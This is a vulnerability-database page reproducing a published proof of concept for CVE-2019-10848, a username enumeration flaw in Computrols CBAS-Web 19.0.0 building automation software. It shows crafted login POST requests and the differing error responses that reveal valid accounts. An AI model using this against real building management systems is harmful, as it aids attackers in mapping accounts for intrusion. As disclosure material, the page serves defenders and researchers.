Lucene search
LiquidWorm1337DAY-ID-33504HistoryNov 12, 2019 - 12:00 a.m.
CBAS-Web 19.0.0 - Username Enumeration Vulnerability
2019-11-1200:00:00
LiquidWorm
0day.today
57
0.022 Low
EPSS
Percentile
89.6%
Exploit for hardware platform in category web applications
# Exploit Title: CBAS-Web 19.0.0 - Username Enumeration
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : CVE-2019-10848
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Testing for non-valid user:
POST /cbas/index.php?m=auth&a=login HTTP/1.1
username=randomuser&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62
# Response for non-valid user:
<!-- Failed login comments appear here -->
<p class="alert-error">randomuser</p>
========================================================================
Testing for valid user:
POST /cbas/index.php?m=auth&a=login HTTP/1.1
username=admin&password=&challenge=6e4344e7ac62520dba82d7f20ccbd422&response=e09aab669572a8e4576206d5c14befc5s
# Response for valid user:
<!-- Failed login comments appear here -->
<p class="alert-error">Invalid username/password combination. Please try again!</p>
# 0day.today [2019-12-04] #Related
cve
cve
CVE-2019-10848
2019-05-24 17:29:02
packetstorm
packetstorm
Computrols CBAS-Web 19.0.0 Username Enumeration
2019-11-12 00:00:00
exploitpack
exploitpack
CBAS-Web 19.0.0 - Username Enumeration
2019-11-12 00:00:00
prion
prion
Design/Logic Flaw
2019-05-24 17:29:00
cvelist
cvelist
CVE-2019-10848
2019-05-24 16:29:08
nvd
nvd
CVE-2019-10848
2019-05-24 17:29:02
exploitdb
exploitdb
CBAS-Web 19.0.0 - Username Enumeration
2019-11-12 00:00:00
ics
ics
Computrols CBAS Web
2019-05-21 12:00:00